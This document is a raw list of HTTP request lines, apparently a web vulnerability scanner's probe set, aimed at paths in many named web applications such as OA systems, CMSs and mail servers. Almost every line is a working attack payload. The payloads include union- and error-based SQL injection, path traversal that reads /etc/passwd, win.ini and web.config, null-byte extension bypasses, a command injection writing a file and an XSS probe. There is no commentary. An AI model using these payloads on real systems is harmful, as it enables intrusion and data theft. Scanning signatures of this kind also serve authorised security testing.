GET /oa/download_attach.aspx?attach_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/departmentset_corpshow.aspx?bi_id=1'%20and%20(select%20char(106)%2bchar(106))%3E0--
GET /SysManage/role_show.aspx?role_id=char(106)%2bchar(106)
GET /lates/index.html?username=123%27%2f%2a%2a%2fand%2f%2a%2a%2f%28seleselectct%2f%2a%2a%2f1%2f%2a%2a%2ffrom%2f%2a%2a%2f%28selselectect%2f%2a%2a%2fcount%28%2a%29%2Cconcat%280x7c%2C0x7765627363616E3A693A66696E64%2C0x7c%2Cfloor%28rand%280%29%2a2%29%29x%2f%2a%2a%2ffrom%2f%2a%2a%2finformation_schema.tables%2f%2a%2a%2fgroup%2f%2a%2a%2fby%2f%2a%2a%2fx%29a%29%23
POST /kaoqin/JiaoYanDis.asp
GET /admin/accounts_list.aspx?u_department_id=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /tj/list.aspx?typeid=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /filemanage/FolderPower.aspx?folder=1'%20and%20(char(106)%2bchar(106))%3E0--
GET /OperationManage/ViewSecrecyGuestBookMessage.aspx?sn=-12'%20and%20(char(106)%2bchar(106))%3E0--&sp=amdin&oid=0&type=2
POST /Manage/CalendarMemo/load.ashx
GET /php/report/include/ldap.inc
GET /php/report/include/util.inc
GET /php/report/include/config.inc
GET /php/report/lastlogin_list_export.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /user/storage_explore.php
GET /grad/admin/domain_logo.php
GET /user/storage_fold_explore.php
GET /php/mailaction1.php?action=x&index=1.2;echo+123456%3Ex1.txt
POST /user/send_queue/upload_addition.php
GET /php/report/search_lastlogin.php?time=1%20and%201=2%20union%20select%20md5(1122),2,3%20--%20&stime=hehe
GET /php/bill/list_userinfo.php?domain=site.org&ok=1&cp=1%20union%20select%20md5(1122),2,3,4,5%23
POST /grad/admin/admin_logo_upload.php
GET /common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
HEAD /download.ashx?files=../web.config
GET /mailmain?type=login&uid=sec_sj&pwd=&domain=root&style=enterprise
GET /?question/search/%27%75nion%20select%201,2,3,4,5,6,7,8,md5(1122),10,11,12,13,14,15,16,17,18,19,20%23
HEAD /jcms/m_1_9/user/down.jsp?abspathfile=/etc/passwd
GET /Edit/ShowEdit.aspx?Dir=../../&OpenWords=TxtTagKey
GET /jis/manage/databak/showlog.jsp?path=../showlog.jsp
HEAD /download.jsp?path=UserFiles/../download.jsp
GET /tt/trade/register.asp?step=checkdup&checkname=ologinname&checkval=haha'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&pk=0
GET /zwgkinfo/DepartMentInfoList.aspx?CategoryNum=-12'/**/and/**/1=char(106)--&DeptCode=
GET /jis/interface/offer.jsp?flag=user
HEAD /jis/down.jsp?pathfile=./down.jsp%00.jpg
GET /MockLogin.aspx
GET /mobile/user.php?act=order_list
GET /seeyon/management/status.jsp
HEAD /api/download.ashx?fid=nUDWEgdorSH4j/+9GiQTlA==
GET /monitoring?part=web.xml
GET /?/s_tag/hehe%25%27%20union%20select%201,2,3,md5(1122),5,6,7%20from%20go_admin%23
GET /download.action?fullPath=./WEB-INF/web.xml
GET /jcms/workflow/design/readxml.jsp?flowcode=../../../WEB-INF/config/dbconfig
POST /jis/update/update.jsp?fn_billstatus=U
GET /install/install.php
GET /public/minify.php?f=../ooxxooxxo/hehe.js
GET /admin/index.asp
GET /plus/outside.php?id=../template/default/style/yun_index.css%00
GET /productpic.aspx?id=100611)%20and%201=char(106)%20--
GET /jsp/util/file_download.jsp?filePath=../../../../../../../etc/passwd
GET /jsp/util/file_download.jsp?filePath=c:%5Cwindows%5Cwin.ini%00.xml
POST /jcms/m_5_5/m_5_5_3/import.jsp
POST /upload!uploadImg.action
GET /AuthReturn.aspx?APTokenResponse=a$8SOIYyiGVYBge5mdoY5nIeAueY7BixUtLdHqpy8o3RqM9hVnisaXAA==
POST /?do=index&mod=goods
GET /index.php/*123*/'union/**/select/**/1,2,3,4,5,6,7,8,md5(1122),10,11%23&action=getatlbyid
GET /cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
HEAD /webmail/client/mail/index.php?module=operate&action=down&file=./../../mainconfig.php
GET /MoreIndex.aspx?pkId=6434&kw=a'%20and%201=char(106)%20--&st=2&t=1
GET /RuvarHRM/web_include/select_baseinfo.aspx?bt_name=1')%20%20and%20(char(106)%2bchar(106))%3E0--
GET /Default.aspx?item=1)%20and%201=(char(106)%2bchar(106))%20--
GET /news/searchNewsAction.shtml?keywords='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /zwfw/zwfwInfoAction!execute.shtml?action=5&sid='%7C%7C(SELECT%20'ijx'%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'
GET /news/newsInfoAction.shtml?infotype=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20and%20'at'='at
GET /client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
GET /siteserver/userRole/modal_sendMail.aspx?From=User&UserNameCollection=test'+and+char(106)%2bchar(106)=0%20--
GET /admin/include/config.php?depth=../../templates/default/images/css/metinfo.css%00
GET /admin/login/login_check.php?depth=../../templates/default/images/css/metinfo.css%00&admin_index=1
GET /admin/system/lang/lang.func.php?depth=../../../public/js/public.js%00
GET /webusr/check.aspx?loginname=nosec'%20and%201=char(106)%2bchar(106)%20--%20
POST /plugins/phpdisk_client/client_sub.php?action=upload_file
GET /ExhibitionCenter.aspx?area=-12'%20and/**/1=char(106)/**/--
GET /SupplyList.aspx?parentid=88&classid=-12%20and/**/1=char(106)/**/%20--%20
GET /company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
POST /Web/Login.aspx
POST /Web/KeySearch.aspx?searchid=1234
GET /portal/admin/setright.aspx?id=-1
GET /infolist.aspx?ClassId=5)%20and%201122=CONVERT(INT,(SELECT%20CHAR(84)%2bCHAR(97)%2bCHAR(105)%2bCHAR(87)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(103)%2bCHAR(111)%2bCHAR(58)%2bCHAR(104)%2bCHAR(111)%2bCHAR(109)%2bCHAR(101)))%20AND%20(1=1
GET /guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,char(106)%2bchar(106)%2bchar(108)%20--
HEAD /prog/filedown.php?pe_id=MQ==
POST /emlib4/system/DataSource/GetDataGridCtrlResult.aspx?_debug_=undefined
GET /emlib4/format/release/aspx/eml_userwh.aspx
GET /voteresult.aspx?activeid=-1%20UNION%20SELECT%201,char(106)%2bchar(106),3,4,5%20from%20syscolumns%20--
GET /kbase_list.aspx?kcatid=1%20UNION%20SELECT%201,2,char(106)%2bchar(106),4,5,6,7,8%20from%20syscolumns--
GET /getTopLinksPortalCategoriesAction.action?siteId=../../../../../../../../../../windows/win.ini%00.jpg
GET /letter/letter_detail.aspx?id=8'%20%20and+1=char(106)%2bchar(106)%20--
GET /cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
GET /web/doc_hit.jsp?documentid=-21%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
GET /OperationManage/BlogMoreIndex.aspx?pkId=&blogId=1&kw=abc'%20and%201=char(106)%20--&st=1&t=1
HEAD /Tools/stream/FlvStream.ashx?file=./Index.aspx
GET /tj/total.aspx?act=other&typeid=1%27%20AND%209518%3DCONVERT%28INT%2C%28SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2b%28SELECT%20%28CASE%20WHEN%20%289518%3D9518%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%2bCHAR%28100%29%29%29%29%20AND%20%27xhJK%27%3D%27xhJK
GET /webConfigSet/configSetting.aspx?url=/login/index.aspx
GET /cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
POST /mydocument/download.aspx
GET /prog/get_passwd_1.php?user=hehe%3Cscript%3Ealert(42873)%3C/script%3E%20
GET /cjwtlist.aspx?t=(select+convert(int%2c@@version))
GET /FormBuilder/PrintFormList.aspx?file_id=1)/**/UNION/**/ALL/**/SELECT/**/CHR(97)%7C%7CCHR(60)%7C%7CCHR(99),NULL/**/FROM/**/DUAL/**/--
GET /module/sitesearch/index.jsp?keyword=&columnid=-1650)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&keyvalue=&webid=&currpage=2
GET /FormBuilder/yjzxList.aspx?id=1/**/UNION/**/ALL/**/SELECT/**/NULL,NULL,CHR(106)%7C%7CCHR(60)%7C%7CCHR(106)/**/FROM/**/DUAL--
GET /FromBaoShan/LaborSpecial/PlacardView.aspx?info_id=1/**/UNION/**/ALL/**/SELECT/**/CHR(106)%7C%7CCHR(106)%7C%7CCHR(106),NULL,NULL,NULL/**/FROM/**/DUAL--
GET /goods/GoodsAdd.aspx?goodsid=1/**/AND/**/1122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&flag=2
GET /pub/search/search_video_view.asp?id=3&mid=4%20and%201122=CONVERT(INT,(SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29))&yh=1
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /main/findgbm2.asp?sql=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name&sqlbak=SELECT+char%28106%29%2Bchar%28106%29%2Bchar%28106%29+FROM+Master%2E%2ESysDatabases+ORDER+BY+Name%20&px=
GET /ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
GET /nameedit.asp?table=bbs&id=1%20union%20all%20select%20null,null,null,null,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),null%20--&action=edit
GET /jis/front/sdgs/updateuser.jsp
HEAD /lm/down.jsp?pathfile=down.jsp
GET /website/dflz/dflzCjAction!caiwugk_list.action?orgCode=&orgName=&zuOrgCode=&zuOrgName=&cwgkbbh=-21'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--%20&cwgkbmc=
GET /Documents/FolderInfor.asp?POAID=0'%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
POST /meetingroom/MeetingRoom_UseInfo.asp
GET /Documents/FolderInfor.asp?OAID=0%20or%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--&Source=0
GET /lm/front/api/opr_datacall.jsp?fn_billstatus=E&vc_id=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL--
HEAD /downloadFile.action?path=index.jsp
GET /portal/getJsonData.action?userId=9090&ruleID=portal-common.getProFileInfo
GET /lm/front/noontimelist.jsp?flag=a&start=1&end=2&sysid=2'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL%20FROM%20DUAL%20--&groupid=4
POST /php/bill/print_addfeelog.php
GET /objectbox/selectx_userlist.jsp?fn_Keywords=1'%20UNION%20ALL%20SELECT%20NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL--%20&perm=&cPage=1&tiao=
GET /meetingroom/ShenQingInforDis.asp?OAID=-12%20AND%201993%20IN%20(char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100))%20---
GET /information/oa_infordislist.asp?class=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
GET /information/OA_Condition.asp?class=1&subclass=(CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))))---
GET /message/mytreedata.asp?bumenid=-12%20AND%201432=CONVERT(INT,(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)))--%20&time=&time=
POST /house/upload/upload.asp
POST /sbweb/Upload_Save_2.asp
GET /feReport/chartList.jsp?delId=1&reportId=1%20and%201122=CONVERT(INT,(SELECT%20char(119)%2bchar(101)%2bchar(98)%2bchar(115)%2bchar(99)%2bchar(97)%2bchar(110)%2bchar(58)%2bchar(105)%2bchar(59)%2bchar(102)%2bchar(105)%2bchar(110)%2bchar(100)))%20--
GET /jsearch/admin/opr_forcechangepwd.jsp
GET /home/front/search/opr_chatsearch.jsp?action=simplesearch&words=1%25%27%20union%20all%20select%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20DUAL%20--
POST /celive/live/index.php?action=1
GET /admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
GET /baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
POST /Lesktop/command.aspx
GET /Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
POST /Lesktop/sendfile.aspx
GET /Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
GET /modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
GET /jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
GET /lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
GET /jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
GET /managerNManager.action
GET /lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
GET /jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
GET /lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
GET /lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
GET /jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
GET /lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
GET /lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
GET /admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
GET /ModifyNewsAction.do?newsID=-12
GET /plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
POST /manage/Template/DSManage.aspx
GET /index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
GET /api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
GET /admin/admin_adminmodifypwd.aspx
GET /jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
GET /feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
GET /Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
GET /print/search_print_proof.jsp?proof_no=just_sql_test'
POST /include/user/mulbumentree.asp
POST /include/user/usertree.asp
